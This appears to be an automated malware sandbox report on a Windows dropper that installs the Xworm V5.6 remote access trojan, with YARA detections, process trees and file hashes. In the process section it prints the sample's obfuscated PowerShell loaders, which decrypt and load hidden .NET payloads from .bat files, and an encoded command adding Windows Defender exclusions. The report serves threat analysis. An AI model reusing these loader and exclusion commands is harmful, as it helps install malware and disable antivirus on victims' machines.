Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
30-06-2024 01:03
Static task
static1
Behavioral task
behavioral1
Sample
1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe
Resource
win10v2004-20240508-en
General
-
Target
1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe
-
Size
15.6MB
-
MD5
ad3893ee2a8e40f2700236672635f5aa
-
SHA1
80f3c0bc398c473e32eeb1420218be6a5feb291d
-
SHA256
1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727
-
SHA512
748db720695d028c034367f0af26d80ced9700dc497a82ce5a4ce578b39fb24c0f869ddbae3b542b15718523fa3cd29c11f78ded0f9f748ac4954256472a4111
-
SSDEEP
196608:IZu1YQGj4ZSo3jXkpiliRElNhT7kiibJ488hEipzLmCKg4EFJ9UHytjAIgwX4FVE:+u1OjJEIZulNyHytjma0VvjZ6
Malware Config
Signatures
-
Detects Windows executables referencing non-Windows User-Agents 2 IoCs
Processes:
resource yara_rule \Users\Admin\AppData\Roaming\Xworm V5.6.exe INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral1/memory/2492-38-0x0000000001060000-0x0000000001F48000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA -
Detects executables (downlaoders) containing URLs to raw contents of a paste 2 IoCs
Processes:
resource yara_rule \Users\Admin\AppData\Roaming\Xworm V5.6.exe INDICATOR_SUSPICIOUS_EXE_RawPaste_URL behavioral1/memory/2492-38-0x0000000001060000-0x0000000001F48000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawPaste_URL -
Detects executables using Telegram Chat Bot 2 IoCs
Processes:
resource yara_rule \Users\Admin\AppData\Roaming\Xworm V5.6.exe INDICATOR_SUSPICIOUS_EXE_TelegramChatBot behavioral1/memory/2492-38-0x0000000001060000-0x0000000001F48000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TelegramChatBot -
Executes dropped EXE 3 IoCs
Processes:
xworm.bat.exexfixer.bat.exeXworm V5.6.exepid process 1752 xworm.bat.exe 2716 xfixer.bat.exe 2492 Xworm V5.6.exe -
Loads dropped DLL 3 IoCs
Processes:
cmd.execmd.exe1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exepid process 2624 cmd.exe 2636 cmd.exe 3008 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
xworm.bat.exepowershell.exexfixer.bat.exepid process 1752 xworm.bat.exe 3020 powershell.exe 2716 xfixer.bat.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
xworm.bat.exepowershell.exexfixer.bat.exedescription pid process Token: SeDebugPrivilege 1752 xworm.bat.exe Token: SeDebugPrivilege 3020 powershell.exe Token: SeDebugPrivilege 2716 xfixer.bat.exe -
Suspicious use of WriteProcessMemory 27 IoCs
Processes:
1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.execmd.execmd.exeXworm V5.6.exedescription pid process target process PID 3008 wrote to memory of 3020 3008 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe powershell.exe PID 3008 wrote to memory of 3020 3008 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe powershell.exe PID 3008 wrote to memory of 3020 3008 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe powershell.exe PID 3008 wrote to memory of 3020 3008 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe powershell.exe PID 3008 wrote to memory of 2624 3008 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe cmd.exe PID 3008 wrote to memory of 2624 3008 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe cmd.exe PID 3008 wrote to memory of 2624 3008 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe cmd.exe PID 3008 wrote to memory of 2624 3008 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe cmd.exe PID 3008 wrote to memory of 2636 3008 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe cmd.exe PID 3008 wrote to memory of 2636 3008 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe cmd.exe PID 3008 wrote to memory of 2636 3008 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe cmd.exe PID 3008 wrote to memory of 2636 3008 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe cmd.exe PID 2624 wrote to memory of 1752 2624 cmd.exe xworm.bat.exe PID 2624 wrote to memory of 1752 2624 cmd.exe xworm.bat.exe PID 2624 wrote to memory of 1752 2624 cmd.exe xworm.bat.exe PID 2624 wrote to memory of 1752 2624 cmd.exe xworm.bat.exe PID 2636 wrote to memory of 2716 2636 cmd.exe xfixer.bat.exe PID 2636 wrote to memory of 2716 2636 cmd.exe xfixer.bat.exe PID 2636 wrote to memory of 2716 2636 cmd.exe xfixer.bat.exe PID 2636 wrote to memory of 2716 2636 cmd.exe xfixer.bat.exe PID 3008 wrote to memory of 2492 3008 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe Xworm V5.6.exe PID 3008 wrote to memory of 2492 3008 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe Xworm V5.6.exe PID 3008 wrote to memory of 2492 3008 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe Xworm V5.6.exe PID 3008 wrote to memory of 2492 3008 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe Xworm V5.6.exe PID 2492 wrote to memory of 1368 2492 Xworm V5.6.exe WerFault.exe PID 2492 wrote to memory of 1368 2492 Xworm V5.6.exe WerFault.exe PID 2492 wrote to memory of 1368 2492 Xworm V5.6.exe WerFault.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe"C:\Users\Admin\AppData\Local\Temp\1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AdABsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcAbgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdQBoACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAdQBpACMAPgA="2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Roaming\xworm.bat" "2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\xworm.bat.exe"xworm.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_TxKiz = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\xworm.bat').Split([Environment]::NewLine);foreach ($_CASH_XMOQm in $_CASH_TxKiz) { if ($_CASH_XMOQm.StartsWith(':: @')) { $_CASH_ssYCl = $_CASH_XMOQm.Substring(4); break; }; };$_CASH_ssYCl = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ssYCl, '_CASH_', '');$_CASH_CfCmx = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_ssYCl);$_CASH_tsEof = New-Object System.Security.Cryptography.AesManaged;$_CASH_tsEof.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_tsEof.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_tsEof.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+ZLOxcnfG7i9YTWJ7vLTmQj82ou3KT503uJ1I+7Wo6U=');$_CASH_tsEof.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/z4iXtMuBf06DnNNej/bVw==');$_CASH_KWHai = $_CASH_tsEof.CreateDecryptor();$_CASH_CfCmx = $_CASH_KWHai.TransformFinalBlock($_CASH_CfCmx, 0, $_CASH_CfCmx.Length);$_CASH_KWHai.Dispose();$_CASH_tsEof.Dispose();$_CASH_fYpGJ = New-Object System.IO.MemoryStream(, $_CASH_CfCmx);$_CASH_FImSp = New-Object System.IO.MemoryStream;$_CASH_aydNz = New-Object System.IO.Compression.GZipStream($_CASH_fYpGJ, [IO.Compression.CompressionMode]::Decompress);$_CASH_aydNz.CopyTo($_CASH_FImSp);$_CASH_aydNz.Dispose();$_CASH_fYpGJ.Dispose();$_CASH_FImSp.Dispose();$_CASH_CfCmx = $_CASH_FImSp.ToArray();$_CASH_MWQwC = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_CfCmx);$_CASH_eABCx = $_CASH_MWQwC.EntryPoint;$_CASH_eABCx.Invoke($null, (, [string[]] ('')))3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Roaming\xfixer.bat" "2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\xfixer.bat.exe"xfixer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_CnGzR = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\xfixer.bat').Split([Environment]::NewLine);foreach ($_CASH_qdZmU in $_CASH_CnGzR) { if ($_CASH_qdZmU.StartsWith(':: @')) { $_CASH_ZoWEj = $_CASH_qdZmU.Substring(4); break; }; };$_CASH_ZoWEj = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ZoWEj, '_CASH_', '');$_CASH_fXadG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_ZoWEj);$_CASH_HMtAt = New-Object System.Security.Cryptography.AesManaged;$_CASH_HMtAt.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_HMtAt.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_HMtAt.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fIynBYcBUpBBez+nt2djmwJqlIyvat7HzgVRpfM2ODQ=');$_CASH_HMtAt.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+5/SuT9a8EJc5rjsiLxvRg==');$_CASH_tRKDk = $_CASH_HMtAt.CreateDecryptor();$_CASH_fXadG = $_CASH_tRKDk.TransformFinalBlock($_CASH_fXadG, 0, $_CASH_fXadG.Length);$_CASH_tRKDk.Dispose();$_CASH_HMtAt.Dispose();$_CASH_xnUdL = New-Object System.IO.MemoryStream(, $_CASH_fXadG);$_CASH_gkSYz = New-Object System.IO.MemoryStream;$_CASH_UMTAN = New-Object System.IO.Compression.GZipStream($_CASH_xnUdL, [IO.Compression.CompressionMode]::Decompress);$_CASH_UMTAN.CopyTo($_CASH_gkSYz);$_CASH_UMTAN.Dispose();$_CASH_xnUdL.Dispose();$_CASH_gkSYz.Dispose();$_CASH_fXadG = $_CASH_gkSYz.ToArray();$_CASH_lwuuH = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_fXadG);$_CASH_pYHCE = $_CASH_lwuuH.EntryPoint;$_CASH_pYHCE.Invoke($null, (, [string[]] ('')))3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\Xworm V5.6.exe"C:\Users\Admin\AppData\Roaming\Xworm V5.6.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2492 -s 7323⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\xfixer.batFilesize
304KB
MD528a668375e0d2b1cfa1d847fc44934d4
SHA1bd0d7df2f07f879e97e02d13d9eebf0a584fabe7
SHA256cc3de81425f13eba2412c152f843351307b3d7f3cb9bd2da3d577ec5e36f8160
SHA512d35dd9fd930f84f5cf1b042c828b6d2adc3007ff0042153f5f7fd45f8539f4155df8b07f59fe488ab3a03f2af4f8067b56c7276b3c80d3554d02ed930470689c
-
C:\Users\Admin\AppData\Roaming\xworm.batFilesize
317KB
MD5ada0b01d33911547bb0086e0ed152484
SHA1ec81374c631f94c536b51dfb8c42c063bf72ca78
SHA256aba89066a3bbc1addaaa48b4d209dac1e59138afb64c797bf950d286e8e826a1
SHA5126aba80c863169fe3a244e20c6d9cfc13f8f69ff81a8402327603f46700a2798d19d1347f0c34e9301cac9aeec0ae5ae9adc76f571dddb9fdbfac6c23de3aae26
-
C:\Users\Admin\AppData\Roaming\xworm.bat.exeFilesize
442KB
MD592f44e405db16ac55d97e3bfe3b132fa
SHA104c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA2566c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f
-
\Users\Admin\AppData\Roaming\Xworm V5.6.exeFilesize
14.9MB
MD556ccb739926a725e78a7acf9af52c4bb
SHA15b01b90137871c3c8f0d04f510c4d56b23932cbc
SHA25690f58865f265722ab007abb25074b3fc4916e927402552c6be17ef9afac96405
SHA5122fee662bc4a1a36ce7328b23f991fa4a383b628839e403d6eb6a9533084b17699a6c939509867a86e803aafef2f9def98fa9305b576dad754aa7f599920c19a1
-
memory/2492-38-0x0000000001060000-0x0000000001F48000-memory.dmpFilesize
14.9MB